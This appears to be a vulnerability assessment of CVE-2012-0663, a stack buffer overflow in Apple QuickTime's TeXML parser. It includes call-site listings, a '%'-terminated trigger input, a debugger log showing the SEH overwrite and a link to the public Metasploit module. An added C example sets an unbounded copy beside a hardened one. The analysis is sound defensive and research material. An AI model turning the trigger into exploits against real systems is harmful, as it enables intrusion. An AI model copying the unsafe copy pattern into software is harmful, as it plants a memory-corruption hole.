CVE-2012-0663 Apple Quicktime Buffer Overflow
Description
Multiple stack-based buffer overflows in Apple QuickTime before 7.7.2 on Windows allow remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted TeXML file.
Technical Analysis
```
Down p sub_67EED2E0+193 call dangerous_copy_sub_67EED1E0 <-- Interesting (0x67EED473)
Down p sub_67EED2E0+1E7 call dangerous_copy_sub_67EED1E0
Down p sub_67EED2E0+23C call dangerous_copy_sub_67EED1E0
Down p sub_67EED2E0+28D call dangerous_copy_sub_67EED1E0
Down p manage_transform_sub_67EED810+B6 call dangerous_copy_sub_67EED1E0 (*) this is the one we have reviewed
```
We noticed that sub_67EED2E0+193 can also trigger the crash, with even longer data and without triggering the warning. In this particular case, the parser is handling arguments ending with a "%", which can be reached as a 'color' argument, for example:
```
{ color: AAAAAAAAAAAAAA% }
```
where "AAAAAAAAAAAAAA" will be copied onto the stack. Also see poc3.xml for an example. As a result, we get to overwrite the stack with more data (like I said), and we end up overwriting the SEH:
```
(c54.da8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\QuickTime\QTSystem\QuickTime3GPP.qtx -
eax=00000030 ebx=0013cc25 ecx=0e0a7288 edx=0000355f esi=00140000 edi=0013cba0
eip=67eed1f3 esp=0013cb74 ebp=00000004 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
QuickTime3GPP!EatTx3gComponentDispatch+0x4033:
67eed1f3 8806 mov byte ptr [esi],al ds:0023:00140000=41
0:000> !exchain
0013ce24: 30303030
Invalid exception stack at 30303030
0:000> g
(c54.da8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=30303030 edx=7c9032bc esi=00000000 edi=00000000
eip=30303030 esp=0013c7a4 ebp=0013c7c4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
30303030 ?? ???
```
quicktime.qts does not have SafeSEH protection.
The final version of the exploit can be found here:
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/apple_quicktime_texml.rb
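The unchecked copy of a '%'-terminated style value that the assessment above describes, shown in C beside a bounded version, as an added example that is neither Apple's code nor the Metasploit module. The buffer size (VALUE_MAX), the `find_value` helper and the `{ key: value% }` syntax are constructed for illustration.

```c
/* Added example (constructed; not Apple's code, not the Metasploit module):
 * the bug class from the assessment above beside its hardened form. A TeXML
 * style value such as "{ color: 30% }" is copied up to the '%' into a fixed
 * stack buffer; unchecked, an over-long value runs past it onto the stack. */
#include <stddef.h>
#include <string.h>

#define VALUE_MAX 16                 /* constructed size; the real one is unknown */
static char g_out[VALUE_MAX];        /* scratch output buffer for callers */

/* Locate the text after "key:" inside style; NULL if the key is absent. */
static const char *find_value(const char *style, const char *key)
{
    const char *p = strstr(style, key);
    if (p == NULL) return NULL;
    p += strlen(key);
    while (*p == ':' || *p == ' ') p++;
    return p;
}

/* Vulnerable pattern (CWE-121), for contrast only: every byte before '%'
 * goes into a VALUE_MAX stack buffer with no bound check. */
int parse_percent_value_unsafe(const char *style, const char *key)
{
    char buf[VALUE_MAX];
    const char *p = find_value(style, key);
    if (p == NULL) return -1;
    size_t i = 0;
    while (p[i] != '%' && p[i] != '\0') { buf[i] = p[i]; i++; }
    buf[i] = '\0';
    return (int)i;
}

/* Hardened form: the copy is bounded by out_len; an over-long or
 * unterminated value is rejected. Returns the value length, or -1. */
int parse_percent_value(const char *style, const char *key,
                        char *out, size_t out_len)
{
    const char *p = find_value(style, key);
    if (p == NULL) return -1;
    const char *end = strchr(p, '%');
    if (end == NULL) return -1;                 /* no terminating '%' */
    size_t n = (size_t)(end - p);
    if (n >= out_len) return -1;                /* would overflow: reject */
    memcpy(out, p, n);
    out[n] = '\0';
    return (int)n;
}
```

The hardened parser returns -1 for the over-long 'color' argument instead of writing past the buffer, which is the check a fixed copy routine needs before the data reaches the stack.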
General Information
Products
- quicktime
- quicktime 3.0
- quicktime 4.1.2
- quicktime 5.0
- quicktime 5.0.1
- quicktime 5.0.2
- quicktime 6.0
- quicktime 6.0.0
- quicktime 6.0.1
- quicktime 6.0.2
- quicktime 6.1
- quicktime 6.1.0
- quicktime 6.1.1
- quicktime 6.2.0
- quicktime 6.3.0
- quicktime 6.4.0
- quicktime 6.5
- quicktime 6.5.0
- quicktime 6.5.1
- quicktime 6.5.2
- quicktime 7.0
- quicktime 7.0.0
- quicktime 7.0.1
- quicktime 7.0.2
- quicktime 7.0.3
- quicktime 7.0.4
- quicktime 7.1
- quicktime 7.1.0
- quicktime 7.1.1
- quicktime 7.1.2
- quicktime 7.1.3
- quicktime 7.1.4
- quicktime 7.1.5
- quicktime 7.1.6
- quicktime 7.2
- quicktime 7.2.0
- quicktime 7.2.1
- quicktime 7.3
- quicktime 7.3.0
- quicktime 7.3.1
- quicktime 7.3.1.70
- quicktime 7.4
- quicktime 7.4.0
- quicktime 7.4.1
- quicktime 7.4.5
- quicktime 7.5.0
- quicktime 7.5.5
- quicktime 7.6.0
- quicktime 7.6.1
- quicktime 7.6.2
- quicktime 7.6.5
- quicktime 7.6.6
- quicktime 7.6.7
- quicktime 7.6.8
- quicktime 7.6.9
- quicktime 7.60.92.0
- quicktime 7.62.14.0
- quicktime 7.64.17.73
- quicktime 7.65.17.80
- quicktime 7.66.71.0
- quicktime 7.67.75.0
- quicktime 7.68.75.0
- quicktime 7.69.80.9
- quicktime 7.7.0